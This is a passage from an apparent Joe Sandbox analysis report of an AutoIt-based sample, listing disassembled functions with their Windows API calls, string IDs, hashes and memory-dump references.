                                                          • Opcode ID: dfbe30e02e1e02373a70928b5035076830fe1583c227ee08fa8376df394393c1
                                                          • Instruction ID: 86dcb3e77eea7ec814dc8cdad51928abb5570c8094b3e5405997b58c68d2d1b6
                                                          • Opcode Fuzzy Hash: dfbe30e02e1e02373a70928b5035076830fe1583c227ee08fa8376df394393c1
                                                          • Instruction Fuzzy Hash: 5D026E315083419FC726EF24C881AAFBBE5EF99314F04491DF4999B2A2DB34E949CB53
                                                          Function 003445DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _memset.LIBCMT ref: 003445F9
                                                          • GetMenuItemCount.USER32(00405890), ref: 0037D6FD
                                                          • GetMenuItemCount.USER32(00405890), ref: 0037D7AD
                                                          • GetCursorPos.USER32(?), ref: 0037D7F1
                                                          • SetForegroundWindow.USER32(00000000), ref: 0037D7FA
                                                          • TrackPopupMenuEx.USER32(00405890,00000000,?,00000000,00000000,00000000), ref: 0037D80D
                                                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0037D819
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                          • String ID:
                                                          • API String ID: 2751501086-0
                                                          • Opcode ID: 8a61fb5a2be4737094b6dcd055db182d3979fcecc2ae24d390372f9748f7e140
                                                          • Instruction ID: 7ad0a07edb60cbf1ef5bc4c89d755309eb3bb942e588c55fe37aab2a3dcbf7f7
                                                          • Opcode Fuzzy Hash: 8a61fb5a2be4737094b6dcd055db182d3979fcecc2ae24d390372f9748f7e140
                                                          • Instruction Fuzzy Hash: 0471D570604205BEEB329F54DC85FAABFB9FF05364F248226F519AA1E0C7B96C10DB50
                                                          Function 003B89C0 Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 003B89EC
                                                          • CoInitialize.OLE32(00000000), ref: 003B8A19
                                                          • CoUninitialize.OLE32 ref: 003B8A23
                                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 003B8B23
                                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 003B8C50
                                                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,003D2C0C), ref: 003B8C84
                                                          • CoGetObject.OLE32(?,00000000,003D2C0C,?), ref: 003B8CA7
                                                          • SetErrorMode.KERNEL32(00000000), ref: 003B8CBA
                                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 003B8D3A
                                                          • VariantClear.OLEAUT32(?), ref: 003B8D4A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                          • String ID: ,,=
                                                          • API String ID: 2395222682-2941206825
                                                          • Opcode ID: 9ce0db435eabf8b009d686a8cc906017025e835c43895a4f3b0e6317fa0c0674
                                                          • Instruction ID: 6b1bb5e00a9456fd105464c77bd8459fecd203fdac3b1de7dd72223ea4766382
                                                          • Opcode Fuzzy Hash: 9ce0db435eabf8b009d686a8cc906017025e835c43895a4f3b0e6317fa0c0674
                                                          • Instruction Fuzzy Hash: 27C114B16083059FC702DF64C884A6BBBE9FF88348F04495DF68A9B251DB71ED05CB52
                                                          Function 003C0EA5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,003BFE38,?,?), ref: 003C0EBC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpper
                                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                          • API String ID: 3964851224-909552448
                                                          • Opcode ID: 994756849ed0d1f926e9352542e0268b92b1d4663f199d77f099f03691094c09
                                                          • Instruction ID: 6e986eea4cab5f09061731460b71ce9a258239b804faa07f3f75679441006b30
                                                          • Opcode Fuzzy Hash: 994756849ed0d1f926e9352542e0268b92b1d4663f199d77f099f03691094c09
                                                          • Instruction Fuzzy Hash: 3541683411428A8BCF2BEF10D891FEE3764AF22300F154459FD519F296DB35ADAADB60
                                                          Function 0039FAD2 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0037E5F9,00000010,?,Bad directive syntax error,003CF910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0039FAF3
                                                          • LoadStringW.USER32(00000000,?,0037E5F9,00000010), ref: 0039FAFA
                                                            • Part of subcall function 00347F41: _memmove.LIBCMT ref: 00347F82
                                                          • _wprintf.LIBCMT ref: 0039FB2D
                                                          • __swprintf.LIBCMT ref: 0039FB4F
                                                          • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0039FBBE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                          • API String ID: 1506413516-4153970271
                                                          • Opcode ID: d6850c672ebd1a41979b0b75c414573bed0d2655ae169ba1f96ef68b893d8274
                                                          • Instruction ID: 863572839177f8dda2140e4f50ef7ba43ece9b095dac022f4a1d17ced49d7bae
                                                          • Opcode Fuzzy Hash: d6850c672ebd1a41979b0b75c414573bed0d2655ae169ba1f96ef68b893d8274
                                                          • Instruction Fuzzy Hash: 78215C3294421EAFCF27AF90CC56EEE7779BF18300F044465F515AA0A2DB71AA68DB50
                                                          Function 003A536E Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00347D2C: _memmove.LIBCMT ref: 00347D66
                                                            • Part of subcall function 00347A84: _memmove.LIBCMT ref: 00347B0D
                                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 003A53D7
                                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 003A53ED
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003A53FE
                                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 003A5410
                                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 003A5421
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: SendString$_memmove
                                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                          • API String ID: 2279737902-1007645807
                                                          • Opcode ID: 401c17304c0ebf08e7287bc86cd966f0d3177b12d5a4ee87b666c1e2b56fd5e7
                                                          • Instruction ID: 4509c62ae82cb0a238d5bea67dde5d569b5b6e13561f28321ca9414c468e3828
                                                          • Opcode Fuzzy Hash: 401c17304c0ebf08e7287bc86cd966f0d3177b12d5a4ee87b666c1e2b56fd5e7
                                                          • Instruction Fuzzy Hash: 7411942195016D79D726B762DC4ADFF7BBCEF96B40F000429F501AA0D1DF602D45C9A0
                                                          Function 003A46F8 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                          • String ID: 0.0.0.0
                                                          • API String ID: 208665112-3771769585
                                                          • Opcode ID: 09684fc5736848c19e08e46a12e55b0d772937bb2f292d753bfe2d54f5d21c5a
                                                          • Instruction ID: bd77382f97c3c9e84b001ace10b1ff0ffed9895c70584a55bbbe1d783dfb2f8a
                                                          • Opcode Fuzzy Hash: 09684fc5736848c19e08e46a12e55b0d772937bb2f292d753bfe2d54f5d21c5a
                                                          • Instruction Fuzzy Hash: 8011E431904114AFCB27A720EC4AEEB77BDDF43711F0581B6F415EA091EFB29A818791
                                                          Function 003A501C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • timeGetTime.WINMM ref: 003A5021
                                                            • Part of subcall function 0036034A: timeGetTime.WINMM(?,7707B400,00350FDB), ref: 0036034E
                                                          • Sleep.KERNEL32(0000000A), ref: 003A504D
                                                          • EnumThreadWindows.USER32(?,Function_00064FCF,00000000), ref: 003A5071
                                                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 003A5093
                                                          • SetActiveWindow.USER32 ref: 003A50B2
                                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 003A50C0
                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 003A50DF
                                                          • Sleep.KERNEL32(000000FA), ref: 003A50EA
                                                          • IsWindow.USER32 ref: 003A50F6
                                                          • EndDialog.USER32(00000000), ref: 003A5107
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                          • String ID: BUTTON
                                                          • API String ID: 1194449130-3405671355
                                                          • Opcode ID: b2f27416e470a1dca7688e140a1ee74140cd8a586e732343f6816a27b0cd0f50
                                                          • Instruction ID: 2943e899396b807defaf50508587cfeaa95c8455e2ad2d003c3c628907d53a62
                                                          • Opcode Fuzzy Hash: b2f27416e470a1dca7688e140a1ee74140cd8a586e732343f6816a27b0cd0f50
                                                          • Instruction Fuzzy Hash: BB214C71200604BFEB039F20ED89F263AAEEB96389F061038F506D52B1DA719D609B65
                                                          Function 003AD619 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00349997: __itow.LIBCMT ref: 003499C2
                                                            • Part of subcall function 00349997: __swprintf.LIBCMT ref: 00349A0C
                                                          • CoInitialize.OLE32(00000000), ref: 003AD676
                                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 003AD709
                                                          • SHGetDesktopFolder.SHELL32(?), ref: 003AD71D
                                                          • CoCreateInstance.OLE32(003D2D7C,00000000,00000001,003F8C1C,?), ref: 003AD769
                                                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 003AD7D8
                                                          • CoTaskMemFree.OLE32(?,?), ref: 003AD830
                                                          • _memset.LIBCMT ref: 003AD86D
                                                          • SHBrowseForFolderW.SHELL32(?), ref: 003AD8A9
                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 003AD8CC
                                                          • CoTaskMemFree.OLE32(00000000), ref: 003AD8D3
                                                          • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 003AD90A
                                                          • CoUninitialize.OLE32(00000001,00000000), ref: 003AD90C
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                          • String ID:
                                                          • API String ID: 1246142700-0
                                                          • Opcode ID: bff9120619cccdb6f0c094f7a547deaa10bca52585a4eb8ac5ccf719ddea557b
                                                          • Instruction ID: 33ef7d045b26d5b3e8c476b3abc9a2028bc5c405043079600075c017c16880d3
                                                          • Opcode Fuzzy Hash: bff9120619cccdb6f0c094f7a547deaa10bca52585a4eb8ac5ccf719ddea557b
                                                          • Instruction Fuzzy Hash: 0EB1ED75A00109AFDB05DFA4C885EAEBBF9FF49304B148469F90ADB261DB30ED45CB50
                                                          Function 003A034D Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetKeyboardState.USER32(?), ref: 003A03C8
                                                          • SetKeyboardState.USER32(?), ref: 003A0433
                                                          • GetAsyncKeyState.USER32(000000A0), ref: 003A0453
                                                          • GetKeyState.USER32(000000A0), ref: 003A046A
                                                          • GetAsyncKeyState.USER32(000000A1), ref: 003A0499
                                                          • GetKeyState.USER32(000000A1), ref: 003A04AA
                                                          • GetAsyncKeyState.USER32(00000011), ref: 003A04D6
                                                          • GetKeyState.USER32(00000011), ref: 003A04E4
                                                          • GetAsyncKeyState.USER32(00000012), ref: 003A050D
                                                          • GetKeyState.USER32(00000012), ref: 003A051B
                                                          • GetAsyncKeyState.USER32(0000005B), ref: 003A0544
                                                          • GetKeyState.USER32(0000005B), ref: 003A0552
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: State$Async$Keyboard
                                                          • String ID:
                                                          • API String ID: 541375521-0
                                                          • Opcode ID: 5d8d1a0bc4d060ea4bea87759d2d08d021f6a4932f0c9c969833fbbdcb824733
                                                          • Instruction ID: cdeed0ca658b0665f17f1bc2c44645b0f0d5f8b3addc9d2245b98d14bcca77e0
                                                          • Opcode Fuzzy Hash: 5d8d1a0bc4d060ea4bea87759d2d08d021f6a4932f0c9c969833fbbdcb824733
                                                          • Instruction Fuzzy Hash: A251BB24D087842AFB3ADBB188157EEBFB4DF13380F49859D95C25A1C3DA649B4CCB61
                                                          Function 0039C529 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,00000001), ref: 0039C545
                                                          • GetWindowRect.USER32(00000000,?), ref: 0039C557
                                                          • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0039C5B5
                                                          • GetDlgItem.USER32(?,00000002), ref: 0039C5C0
                                                          • GetWindowRect.USER32(00000000,?), ref: 0039C5D2
                                                          • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0039C626
                                                          • GetDlgItem.USER32(?,000003E9), ref: 0039C634
                                                          • GetWindowRect.USER32(00000000,?), ref: 0039C645
                                                          • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0039C688
                                                          • GetDlgItem.USER32(?,000003EA), ref: 0039C696
                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0039C6B3
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0039C6C0
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                          • String ID:
                                                          • API String ID: 3096461208-0
                                                          • Opcode ID: b78ae0ea75e682d74c65d3ff3a96b2a340042ab13007e1ae0047397fac85d229
                                                          • Instruction ID: b53d597d8c5db4f6ea571bb49afc2ced43982fa6702ee2133edee1f6ee4b915d
                                                          • Opcode Fuzzy Hash: b78ae0ea75e682d74c65d3ff3a96b2a340042ab13007e1ae0047397fac85d229
                                                          • Instruction Fuzzy Hash: B7512F71B10205AFDF19CFA9DD89EAEBBBAEB88311F15812DF515D7290D770AD008B50
                                                          Function 0034201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00341B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00342036,?,00000000,?,?,?,?,003416CB,00000000,?), ref: 00341B9A
                                                          • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 003420D3
                                                          • KillTimer.USER32(-00000001,?,?,?,?,003416CB,00000000,?,?,00341AE2,?,?), ref: 0034216E
                                                          • DestroyAcceleratorTable.USER32(00000000), ref: 0037BE26
                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003416CB,00000000,?,?,00341AE2,?,?), ref: 0037BE57
                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003416CB,00000000,?,?,00341AE2,?,?), ref: 0037BE6E
                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003416CB,00000000,?,?,00341AE2,?,?), ref: 0037BE8A
                                                          • DeleteObject.GDI32(00000000), ref: 0037BE9C
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                          • String ID:
                                                          • API String ID: 641708696-0
                                                          • Opcode ID: d5447f9834d721ddf5766d932d74b06eface4231e6231fb9df5879689510117d
                                                          • Instruction ID: b96872554a27527a5117a2c67041371756e5a24b27cae946bfef10dbeb4869c2
                                                          • Opcode Fuzzy Hash: d5447f9834d721ddf5766d932d74b06eface4231e6231fb9df5879689510117d
                                                          • Instruction Fuzzy Hash: F1617932100A10DFDB37AF14DA48B2BB7F6FB40312F918529E546ABA60C774B890DF95
                                                          Function 003421A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 003425DB: GetWindowLongW.USER32(?,000000EB), ref: 003425EC
                                                          • GetSysColor.USER32(0000000F), ref: 003421D3
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ColorLongWindow
                                                          • String ID:
                                                          • API String ID: 259745315-0
                                                          • Opcode ID: de1cdd8cf6fbc0bb35e40b2dde455d30f58e957114c9c2f120c9e8112d24c41b
                                                          • Instruction ID: b4c7935facfe4af4e0dfc161870fb148f7b9c1d2acf379fc92b66b62345bcb74
                                                          • Opcode Fuzzy Hash: de1cdd8cf6fbc0bb35e40b2dde455d30f58e957114c9c2f120c9e8112d24c41b
                                                          • Instruction Fuzzy Hash: 2C41D331000514DFDB235F28EC48BBA3BAAEB06331F598265FD65AE1E1C771AC41DB61
                                                          Function 003AA931 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CharLowerBuffW.USER32(?,?,003CF910), ref: 003AA995
                                                          • GetDriveTypeW.KERNEL32(00000061,003F89A0,00000061), ref: 003AAA5F
                                                          • _wcscpy.LIBCMT ref: 003AAA89
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: BuffCharDriveLowerType_wcscpy
                                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                          • API String ID: 2820617543-1000479233
                                                          • Opcode ID: 3b5ec9931a9cbaf378185fe8b6e984b9e0a0b5709000d3f3e517e827b5103bbd
                                                          • Instruction ID: d1c1660a905fc6c0594a4e5322ac28e6697ae650230badb04025efd13cb16bfc
                                                          • Opcode Fuzzy Hash: 3b5ec9931a9cbaf378185fe8b6e984b9e0a0b5709000d3f3e517e827b5103bbd
                                                          • Instruction Fuzzy Hash: 3351AD321187019FC716EF14C892AAFB7E9EF81300F10492DF5969F2A2DB31A909CB53
                                                          Function 00349997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
